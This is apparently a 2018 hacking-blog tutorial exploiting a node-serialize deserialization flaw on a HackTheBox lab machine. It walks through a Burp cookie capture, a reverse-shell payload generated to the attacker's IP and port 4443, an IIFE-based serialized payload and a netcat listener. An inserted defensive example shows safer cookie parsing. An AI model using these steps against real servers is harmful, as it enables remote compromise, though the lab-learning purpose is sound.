Node.js Deserialization Attack – Detailed Tutorial 2018

Node.js is a JavaScript runtime built on Google's V8 engine, which compiles and runs JavaScript with high performance. Node.js adds its own APIs and optimizes certain cases so that V8 runs effectively outside the browser.

However, a remote code execution vulnerability exists in the deserialization path of the node-serialize library used by Node.js applications. By sending a JavaScript IIFE inside untrusted serialized data, an attacker can have arbitrary code executed during deserialization.

Practical Demonstration – 

About the Vulnerability (Deserialization Attack) –

Untrusted data passed into the unserialize() function lets an attacker embed an immediately invoked function expression (IIFE) in the serialized JavaScript object, which achieves arbitrary code execution when the object is deserialized.

The first step is to install the nodejs package with apt-get, as shown below:

Command: apt-get install nodejs

Next, install the npm utility (needed to install the node-serialize package) with the following curl command:

Command: curl -L https://www.npmjs.com/install.sh | sh

Once Node.js and npm are installed and configured, install the node-serialize package with npm by typing "npm install node-serialize" as shown below:

On the other side, we have already connected to the HackTheBox server whose vulnerable Node machine is at 10.10.10.85:3000 (where the Node.js Express framework is running, which you can confirm with an Nmap scan).

So, in the first step, capture the GET request to the vulnerable Node.js IP above with Burp Suite, one of the most popular intercepting proxy tools, which looks like below:

In the second step, select the cookie value and send it to the Decoder tab for base64 decoding.

The vulnerability in this web application is that it reads a cookie named profile from the HTTP request, base64-decodes the cookie value and passes it to the unserialize() function. Since the cookie is untrusted input, an attacker can craft a malicious cookie value to exploit this vulnerability.
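As an added example (not code from the original post or from the vulnerable application), here is a hardened replacement for the cookie handling just described: the profile cookie is base64-decoded and parsed with JSON.parse, which can only produce plain data, and only validated fields are passed on. The field name "username" and the length limits are assumptions; the `_$$ND_FUNC$$_` prefix is the marker node-serialize uses for serialized functions and is checked here purely as a detection signal.

```javascript
// Added example, not from the original post or the vulnerable application.
// The vulnerable handler does roughly:
//   unserialize(Buffer.from(req.cookies.profile, 'base64').toString())
// and node-serialize rebuilds any function it finds in the decoded string.
// This replacement parses the cookie with JSON.parse, which can only yield
// plain data, and copies out only the validated fields. The field name
// "username" and the length limits are assumptions for this example.

// node-serialize marks serialized functions with this prefix; seeing it in a
// decoded cookie is a strong signal worth logging or alerting on.
const ND_FUNC_MARKER = '_$$ND_FUNC$$_';

function looksLikeSerializedFunction(decoded) {
  return typeof decoded === 'string' && decoded.includes(ND_FUNC_MARKER);
}

// Returns a validated profile object, or null if the cookie must be rejected.
function parseProfileCookie(raw) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 4096) {
    return null; // missing or oversized cookie
  }
  const decoded = Buffer.from(raw, 'base64').toString('utf8');
  if (looksLikeSerializedFunction(decoded)) {
    return null; // a node-serialize function payload: reject and log
  }
  let obj;
  try {
    obj = JSON.parse(decoded); // never constructs functions, unlike unserialize()
  } catch (e) {
    return null; // not valid JSON
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return null; // profile must be a plain object
  }
  const username = obj.username;
  if (typeof username !== 'string' || !/^[A-Za-z0-9_.-]{1,32}$/.test(username)) {
    return null; // enforce the type the app expects ("invalid username type")
  }
  return { username }; // only whitelisted, validated fields reach the app
}
```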

In the third step, download the Node.js Security Toolkit developed by Ajin Abraham, a well-known mobile security expert.

To install Nodejs Security Toolkit, type the following command in your terminal.

Command: git clone https://github.com/ajinabraham/Node.Js-Security-Course.git

Navigate to the downloaded folder and run the following command to create a reverse shell payload, which evaluates the JavaScript code as a string.

First, find out the tunnel IP by typing "ifconfig", then run the following command:

Command: python nodejsshell.py 10.10.14.145 4443

This is the output of final reverse shell payload.

Now let’s generate the serialized payload with the following javascript.

Code:

// Object with a function-valued property; node-serialize encodes the function's source text
var y = {
    rce : function() {}
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

Add the payload output from above inside the curly brackets of the function body, i.e. {   eval(String.from………   } as shown below:

Save the file as exploit.js and run it with the node command, which generates the final serialized payload as shown below:

Command: node exploit.js

Now go back to Burp Suite, open the Decoder tab, paste the output above into the text area and, before decoding, add the IIFE brackets () after the function body as shown below:

Here we base64-encode the result and then make a request to the web server with the encoded payload as the Cookie header value.

To make the request, send the same request to the Repeater tab.

In the Repeater tab, replace the cookie value with the base64-encoded value generated in the previous step and click the Go button.

At the same time, make sure your netcat listener is running on the same port, i.e. 4443 (the port used in the reverse shell payload):

Command: nc -lvp 4443

As soon as you click the Go button, the request hits the server, which returns a 200 OK response with the error message "An error occurred...invalid username type", and you immediately get a connection from that server in the netcat terminal with the status "Connected".



Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
